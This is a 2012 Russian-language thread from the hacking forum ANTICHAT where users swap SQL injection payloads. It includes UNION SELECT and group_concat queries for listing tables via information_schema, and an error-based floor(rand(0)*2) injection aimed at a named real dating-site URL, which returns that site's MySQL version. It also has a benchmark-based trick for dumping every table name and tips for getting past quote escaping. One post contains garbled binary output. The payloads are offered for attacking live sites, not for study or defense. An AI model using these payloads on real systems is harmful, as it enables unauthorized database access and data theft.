HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 09.02.2012, 00:17
pirat0
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами: 8063606

Репутация: -1
По умолчанию

Цитата:
Сообщение от sl1k  
16 символов навело на мысль что это sql хеш , но че он в таком странном виде?
Подскажите кто нибудь хоть что-то плз .
а у тебя случяйно не blind injection??
 
Ответить с цитированием

  #2  
Старый 09.02.2012, 00:25
pirat0
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами: 8063606

Репутация: -1
По умолчанию

Цитата:
Сообщение от ivan151  
есть ли запрос чтобы не юзать постоянно лимит(я о такой конструкции union+select+1,2,3,4,table_name+from+information_s chema.tables+limit+1,1) а что-бы вывести все таблицы с одного поля или нескольких,просто есть всего 2 поля
есть - union+select+1,2,3,4,group_concat(table_name)+from +information_schema.tables+where+table_schema='и я database()'

но вывести можго только 1024 символа
 
Ответить с цитированием

  #3  
Старый 09.02.2012, 00:43
Osstudio
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами: 7932566

Репутация: 81


По умолчанию

В общем так, есть сайт, и при site.com/lol.php?id=1' выдаётся ошибка mysql_fetch_object(), и кавычка экранируется как \' ...

а при /**/order/**/by/**/9999-- и т.п еррора нету, думал что запрос обрамлён в кавычки, но видимо не так, так как другим раскрутить удалось, собственно, какие идеи?

P.S Error-based тоже юзал..
 
Ответить с цитированием

  #4  
Старый 09.02.2012, 00:47
Osstudio
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами: 7932566

Репутация: 81


По умолчанию

Цитата:
Сообщение от pirat0  
есть - union+select+1,2,3,4,group_concat(table_name)+from +information_schema.tables+where+table_schema='и я database()'
но вывести можго только 1024 символа
юзай mid()

а вообще LIMIT бы не мешало сначала
 
Ответить с цитированием

  #5  
Старый 09.02.2012, 01:34
TYPUCT
Познающий
Регистрация: 07.09.2010
Сообщений: 30
С нами: 8252246

Репутация: 0
По умолчанию

Есть идеи как нибудь раскрутить это?

Цитата:
Сообщение от None  
http://www.datingtop.net/index.php?id=10'
 
Ответить с цитированием

  #6  
Старый 09.02.2012, 01:57
sl1k
Новичок
Регистрация: 31.07.2009
Сообщений: 1
С нами: 8832539

Репутация: 0
По умолчанию

Цитата:
Сообщение от pirat0  
а у тебя случяйно не blind injection??
нет через обычный union вывожу.

cв§±uКч"‡Bњn

dс\ ґЃJК.я-йј

ЛXЫ l[Ж RЂNяїџъ

ХzWt 9:fЗРЭh.G

JyM·B>ґ
 
Ответить с цитированием

  #7  
Старый 09.02.2012, 02:12
pirat0
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами: 8063606

Репутация: -1
По умолчанию

Цитата:
Сообщение от TYPUCT  
Есть идеи как нибудь раскрутить это?
http://www.datingtop.net/index.php?id=10+and(select+count(*)+from+informati on_schema.tables+group+by(concat(version(),0x00,fl oor(rand(0)*2))))--+

Код:
Duplicate entry '5.0.92-community' for key 1
 
Ответить с цитированием

  #8  
Старый 09.02.2012, 02:23
pirat0
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами: 8063606

Репутация: -1
По умолчанию

[QUOTE="sl1k"]
нет через обычный union вывожу.
cв§±uКч"‡Bњn
dс\ ґЃJК.я-йј
ЛXЫ l[Ж RЂNяїџъ
ХzWt9:fЗРЭh.G
JyM·B>ґґ
 
Ответить с цитированием

  #9  
Старый 09.02.2012, 02:33
sl1k
Новичок
Регистрация: 31.07.2009
Сообщений: 1
С нами: 8832539

Репутация: 0
По умолчанию

Цитата:
Сообщение от pirat0  
ты руками выводиш или прогой??
и руками и прогой
 
Ответить с цитированием

  #10  
Старый 09.02.2012, 13:22
Melfis
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами: 7921046

Репутация: 53


По умолчанию

Цитата:
Сообщение от ivan151  
есть ли запрос чтобы не юзать постоянно лимит(я о такой конструкции union+select+1,2,3,4,table_name+from+information_s chema.tables+limit+1,1) а что-бы вывести все таблицы с одного поля или нескольких,просто есть всего 2 поля
select concat(@i:=0,@a:=0x3a,benchmark(666,@a:=concat(@a, 0x3a,(select @i:=table_name from information_schema.tables where table_name>@i limit 1))),@a)

где 666 - кол-во строк не более максимального значения в таблице.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.